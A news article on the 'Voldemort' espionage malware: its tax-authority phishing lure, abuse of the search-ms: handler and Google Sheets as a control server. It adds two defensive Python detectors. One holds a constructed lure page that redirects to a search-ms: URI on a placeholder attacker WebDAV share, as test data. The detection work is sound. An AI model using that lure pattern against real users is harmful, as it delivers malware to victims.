The Major Attack: 'Voldemort' Malware Strikes France - Who's Behind It?

A new piece of malware called "Voldemort" has been spotted in France. Designed to steal confidential data, it is delivered by emails impersonating the General Directorate of Public Finances. The attack is believed to be the work of a state-sponsored group...

In early August 2024, a new piece of malware appeared on the radar of Proofpoint researchers. Proofpoint dubbed it "Voldemort" after the Harry Potter villain, a reference the operators left in the malware's internal file and variable names. According to the California-based security firm's investigation, it was part of a large-scale espionage operation.

First, the hackers impersonated "tax authorities from governments in Europe, Asia, and the United States." Since the malicious activity began, more than 70 organizations around the world have been targeted. At the beginning of the campaign, Proofpoint recorded a few hundred emails per day. The cybercriminals quickly picked up the pace: on August 17, they sent nearly 6,000 emails in 24 hours.

Update your tax information

In France, the hackers chose to pose as the General Directorate of Public Finances, the department responsible for collecting taxes. The victims are contacted by email. The message states that "as part of the update of tax rates and the current tax system, it is necessary to review your tax information," and asks the recipient to update "their personal and tax information as soon as possible."

"This update is essential for the smooth running of your returns and the accurate calculation of your tax liabilities," the fraudulent email adds, to push the target into compliance.

To update their tax information, the recipient must open the document the email points to. Not surprisingly, that document is what delivers Voldemort onto the computer. Specifically, the attack relies on the "search-ms:" URI protocol handler to open a remotely hosted file that pushes the malware. Built into Windows, "search-ms:" launches a customized search in Windows Explorer and makes it easier to find files or information on the device. The handler is widely abused by attackers: according to Microsoft, it has been exploited, for example, by the Russian group APT28.

"Typically, hackers abuse the Windows search protocol (search-ms) to display files hosted on a remote machine as if they were in a local folder. This technique is often used to deploy various remote access Trojans," Proofpoint notes.
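The practical check that follows from this is to look at what a search-ms: link actually points at. The URI carries its scope in crumb=location: parameters; a local folder is normal, a UNC path or URL to some outside host (WebDAV shares show up as \\host@SSL\DavWWWRoot) means Explorer is about to display an attacker's files as if they were local. The script below is an added example written for this article, not Proofpoint's or the malware's code; the landing page, the hostname files.example.invalid and the local sample are constructed.

```python
"""Find search-ms: URIs that point Windows Explorer at a remote share.

Added example for this article; it is not Proofpoint's or the malware's code.
The URI syntax it parses (search-ms:query=...&crumb=location:...&displayname=...)
is Windows' own; the sample page and hostnames below are constructed.
"""
import re
from urllib.parse import unquote

# Anything beginning with a UNC prefix (\\host\share, \\host@SSL\DavWWWRoot for
# WebDAV) or a URL scheme is not a local folder.
REMOTE_LOCATION = re.compile(r"^(\\\\|//|[a-z][a-z0-9+.-]*://)", re.IGNORECASE)
URI_PATTERN = re.compile(r"search-ms:[^\s\"'<>]+", re.IGNORECASE)


def parse_search_ms(uri: str) -> dict:
    """Split a search-ms: URI into its parameters; 'crumb' may repeat."""
    if not uri.lower().startswith("search-ms:"):
        raise ValueError("not a search-ms: URI")
    params = {"crumb": []}
    for part in uri[len("search-ms:"):].split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        value = unquote(value)  # values are percent-encoded, e.g. %5C for '\'
        if key.lower() == "crumb":
            params["crumb"].append(value)
        else:
            params[key.lower()] = value
    return params


def remote_locations(uri: str) -> list[str]:
    """Return every crumb=location: value that is not a local path."""
    hits = []
    for crumb in parse_search_ms(uri)["crumb"]:
        name, _, value = crumb.partition(":")
        if name.lower() == "location" and REMOTE_LOCATION.match(value):
            hits.append(value)
    return hits


def scan_text(text: str) -> list[tuple[str, list[str]]]:
    """Extract search-ms: URIs from page/email content and keep the remote ones."""
    findings = []
    for uri in URI_PATTERN.findall(text):
        remote = remote_locations(uri)
        if remote:
            findings.append((uri, remote))
    return findings


# Constructed landing page modelled on the lure flow described in the article:
# the link opens an Explorer search window whose only "result" lives on an
# attacker-controlled WebDAV share (the hostname is a placeholder).
SAMPLE_PAGE = """<html><body>
<a id="doc" href="#">Click to view document</a>
<script>
document.getElementById("doc").onclick = function () {
  window.location.href = "search-ms:query=Tax&crumb=location:%5C%5Cfiles.example.invalid@SSL%5CDavWWWRoot&displayname=Downloads";
};
</script></body></html>"""

# A benign URI of the same shape: the search is scoped to a local folder.
SAMPLE_LOCAL = r"search-ms:query=invoice&crumb=location:C:\Users\alice\Documents&displayname=Documents"

if __name__ == "__main__":
    for uri, remote in scan_text(SAMPLE_PAGE):
        print("suspicious:", uri)
        for loc in remote:
            print("  remote location:", loc)
    print("local sample flagged:", bool(remote_locations(SAMPLE_LOCAL)))
```

The same parser can run over mail bodies at the gateway or over proxied HTML; what matters is the location crumb, not the query text. On the endpoint side, a commonly recommended hardening step is to remove the handler registration under HKEY_CLASSES_ROOT\search-ms, with the caveat that this also breaks legitimate saved-search links.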

Google Sheets as a Control Server

Cybercriminals typically use command-and-control servers to communicate with machines infected with their malware. In this case, Google Sheets, the popular online spreadsheet service, is turned into that server: to receive its instructions, the malware connects to the spreadsheet service. This is a highly unusual move, and one that lets the traffic blend in with legitimate use of Google services, which few organizations can block outright.

Once on the targeted computer and connected to the spreadsheet, Voldemort can test the connection to its server, list and index files on the system, download or upload files, execute commands, pause, or terminate itself altogether. This is when the hackers take what they came for: confidential data.
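Because the destination is a Google API, the detection question is not "who talks to sheets.googleapis.com" but "which process does, and how regularly". The script below is an added example written for this article, not Proofpoint's detection content. It assumes endpoint telemetry that ties each outbound request to a process (EDR or Sysmon network events); the pipe-delimited log, the hostnames WS-042 and WS-017 and the process name updater.exe are constructed.

```python
"""Flag non-browser processes that poll the Google Sheets API like a C2 beacon.

Added example for this article, not Proofpoint's detection content. It assumes
endpoint telemetry that ties each outbound request to a process (EDR / Sysmon
network events); the pipe-delimited log below is constructed for the example.
"""
import statistics
from collections import defaultdict
from datetime import datetime

SHEETS_API_HOST = "sheets.googleapis.com"
# Processes expected to talk to Google APIs directly on a typical workstation.
BROWSER_ALLOWLIST = {"chrome.exe", "msedge.exe", "firefox.exe"}

# Constructed events: timestamp|host|process|destination host|path
SAMPLE_LOG = """\
2024-08-17T09:00:02Z|WS-042|chrome.exe|sheets.googleapis.com|/v4/spreadsheets/abc/values/Sheet1
2024-08-17T09:00:05Z|WS-042|updater.exe|oauth2.googleapis.com|/token
2024-08-17T09:00:06Z|WS-042|updater.exe|sheets.googleapis.com|/v4/spreadsheets/abc/values/Sheet1
2024-08-17T09:01:06Z|WS-042|updater.exe|sheets.googleapis.com|/v4/spreadsheets/abc/values/Sheet1
2024-08-17T09:02:06Z|WS-042|updater.exe|sheets.googleapis.com|/v4/spreadsheets/abc/values/Sheet1
2024-08-17T09:03:06Z|WS-042|updater.exe|sheets.googleapis.com|/v4/spreadsheets/abc/values/Sheet1
2024-08-17T09:03:10Z|WS-017|EXCEL.EXE|sheets.googleapis.com|/v4/spreadsheets/def/values/Sheet1
2024-08-17T09:05:00Z|WS-042|chrome.exe|docs.google.com|/spreadsheets/d/abc
"""


def parse_line(line: str) -> dict:
    """Parse one constructed log line into a dict with a datetime timestamp."""
    ts, host, process, dest, path = line.split("|", 4)
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
        "host": host, "process": process, "dest": dest, "path": path,
    }


def find_sheets_beacons(log_text: str, min_requests: int = 3) -> list[dict]:
    """Group Sheets API requests by (host, process) and report the unexpected ones.

    A process outside the browser allowlist that keeps calling the Sheets API is
    the pattern the article describes; the median gap between its requests
    exposes a fixed polling interval.
    """
    times = defaultdict(list)
    for line in log_text.strip().splitlines():
        ev = parse_line(line)
        if ev["dest"] == SHEETS_API_HOST:
            times[(ev["host"], ev["process"])].append(ev["ts"])

    findings = []
    for (host, process), stamps in sorted(times.items()):
        if process.lower() in BROWSER_ALLOWLIST or len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        findings.append({
            "host": host,
            "process": process,
            "requests": len(stamps),
            "median_gap_s": statistics.median(gaps) if gaps else None,
        })
    return findings


if __name__ == "__main__":
    for f in find_sheets_beacons(SAMPLE_LOG):
        print(f"{f['host']}: {f['process']} hit {SHEETS_API_HOST} "
              f"{f['requests']} times, median interval {f['median_gap_s']:.0f}s")
```

The allowlist has to be tuned per environment: spreadsheet add-ins, sync clients and automation scripts legitimately call the same API, which is exactly why the technique works. If only a proxy log without process names is available, the fallbacks are the User-Agent string (a browser's versus a bare HTTP library's) and the regularity of the requests, which is what the median gap measures.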

State-funded espionage campaign

Insurance companies are the main targets of the spies. According to Proofpoint, Voldemort is designed to steal information held by certain companies; it also targets the aviation, transportation and education sectors. Proofpoint believes the campaign is likely orchestrated by a state-sponsored group.

However, at this point researchers have been unable to attribute it to a specific group. As our colleagues at Bleeping Computer reported, a group known by the codename APT41 has already made a name for itself by exploiting Google Sheets in the past. The Chinese state-sponsored group relied on an open-source tool called "Google Command and Control" (GC2), designed to repurpose legitimate Google services such as Google Sheets, Google Forms, or Google Drive for malicious ends. It is known to have targeted industries in the United States, Asia, and Europe for more than a decade.
